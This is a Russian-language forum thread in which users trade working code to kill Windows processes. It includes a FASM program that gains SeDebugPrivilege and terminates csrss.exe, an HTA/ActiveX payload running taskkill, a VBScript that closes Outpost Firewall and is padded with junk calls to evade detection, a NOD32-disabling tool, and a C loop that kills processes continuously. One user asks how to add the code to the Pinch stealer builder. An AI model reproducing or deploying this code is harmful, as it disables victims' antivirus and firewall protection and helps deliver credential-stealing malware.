Нужен скрипт.

[...ъХ...]

Компиллятору чёт 19 строчка не дравится в исходники и 86 с 106 в stuct(откуда он вылез???)
Видно сразу понять не получится
:swoon2:

 

[salamandra]

Вот те готовый ехе!
http://rapidshare.de/files/27143008/Kill.rar.html

 

[...ъХ...]

Я так понимаю csrss.exe рубит, исходничек...
salamandra что у тебя всё компилится я не сомневаюсь, но у меня блин как всегда
Я что, как то не правильно компиллирую в fasm'e=))
1)Скопировал исходник
2)Сохранил на диске file.asm
3)Открыл FASMW этот фаил
4)Нажал F9, ну или CTRL+F9

Что тут может быть не правильного, если у тебя компиллется нормально приведённый тобой исходник, то почему у меня то ерроры выскакивают...
:bang:

 

[salamandra]

Теперь скомпилится!

format PE GUI 4.0
include 'include\win32a.inc'

entry start
;---------------------------------------------------------------------------------
TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES =28h
TH32CS_SNAPPROCESS = 2

struct PROCESSENTRY32
dwSize dd ?
cntUsage dd ?
th32ProcessID dd ?
th32DefaultHeapID dd ?
th32ModuleID dd ?
cntThreads dd ?
th32ParentProcessID dd ?
pcPriClassBase dd ?
dwFlags dd ?
szExeFile db 260 dup(?)
ends


PrivilegeCount dd ?
pLocalId dd ?
Attributes dd ?
phToken dd ?
hSnapshot dd ?
prcs PROCESSENTRY32

PrcList db 'csrss.exe',0
Privilege db 'SeDebugPrivilege',0


start: invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES,phToken
invoke LookupPrivilegeValue,0,Privilege ,pLocalId
mov [PrivilegeCount],1
mov [Attributes],2
invoke AdjustTokenPrivileges,[phToken],0,PrivilegeCount ,0,0,0

mov [prcs.dwSize],sizeof.PROCESSENTRY32
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
mov [hSnapshot], eax
invoke Process32First,[hSnapshot],prcs
f: mov edi,PrcList
invoke StrStrI,prcs.szExeFile, edi
cmp eax,0
je _NextProc
call kill


_NextProc:
invoke Process32Next,[hSnapshot],prcs
cmp eax,0
jne f
invoke ExitProcess,0
kill: invoke OpenProcess,PROCESS_TERMINATE,0,[prcs.th32ProcessID]
invoke TerminateProcess,eax,0
retn

data import

library kernel32,'KERNEL32.DLL',\
advapi32,'ADVAPI32.DLL',\
shell32,'SHELL32.DLL'


include 'include\APIA\kernel32.inc'
include 'include\APIA\advapi32.inc'
include 'include\APIA\shell32.inc'
end data

 

[/dev/AVR]

Блин, тут речь об асме или о скриптах.
Если о скриптах то

<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("taskkill /f /im Bla bla bla");
</script>
</html>

Старое и вроде бы работало

Как HTA ссылку лучше создать. Под IE разумеется

 

[...ъХ...]

Неа, тут речь об асме=)
salamandra ну у меня теперь только 2 вопроса могут возникнуть
1)Как убивать несколько процессов разом, вообщем что надо поправить в исходниках для этого?
2)Каким образом добавить этот код в билдер ПИНЧА

 

[salamandra]

Ну ты я вижу очень большой любитель халявы!
Потрудись как ты немножко сам!

 

[...ъХ...]

А кто её не любит
salamandra тогда можеш дать небольшие подсказки, как это сделать?
:help:

 

[salamandra]

Лучшая подсказка это www.wasm.ru
Там ты найдёш искомое
А как запихнуть нужный код в пинч,
так тут лиш нужно знать синтаксис
масм а перед фасмом отличия
не такие уж и большие!
Зделать код в виде процедуры
и подключить её к основному модулю
А как это зделать
используй соответствующий макрос для этого!

 

[The Chosen One]

Kill Outpost.vbs

set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
Asc("qwrgweriwrweurihweiurh")
Cos(15)
Fix(567.875)
Mid "egfejbHJB73495778^*54",10
UCase("ergerjhtnertuierhtbvnvbzxnbcjhwdwrwjetnertportribmdmfnbdsubf")
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

Скрипт не палится!

 

[Ŧ1LAN]

This Application demonstrate how disable NOD32 Protection.
Source code is included, Tested on NOD32 NT version.
This technique can work with lot of AVGs.
Type yes if u want to disable NOD32 protection

как уже понятно, данный скриптик вырубает нод, сорсы на делфи присутвуют.)
берём в атаче.

 

[pro5to]

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
//-----------------------------------------------------------------
struct{
char* szProcName;
} processes[] = {

"имя_процеса.exe",
"имя_процеса.exe"
};
//-----------------------------------------------------------------
void header(void){
printf("ProcessKiller by: Dr.Pixel\n");
printf("--------------------------\n");
printf("icq : 7600278\n");
printf("web : http://dkcs.void.ru\n");
printf("mail: dkcs@void.ru\n");
printf("--------------------------\n");
printf("start...\n\n");
}
//-----------------------------------------------------------------
void main(void){
HANDLE hSnapShot;
HANDLE hProcess;
PROCESSENTRY32 pe;
BOOL bProcessResult;

header();
while(1){
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe.dwSize = sizeof(PROCESSENTRY32);
bProcessResult = Process32First(hSnapShot, &pe);
while(bProcessResult){
for(int i=0; i<((int)(sizeof processes/sizeof processes[0])); i++){
if(strcmp(pe.szExeFile, processes.szProcName) == 0){
hProcess = OpenProcess(PROCESS_TERMINATE, TRUE, pe.th32ProcessID);
if(hProcess != NULL){
printf("Detecting <%s> process! Terminating...\n", processes.szProcName);
TerminateProcess(hProcess, 0);
}

}
}
bProcessResult = Process32Next(hSnapShot, &pe);

}
Sleep(250);
}
}
//-----------------------------------------------------------------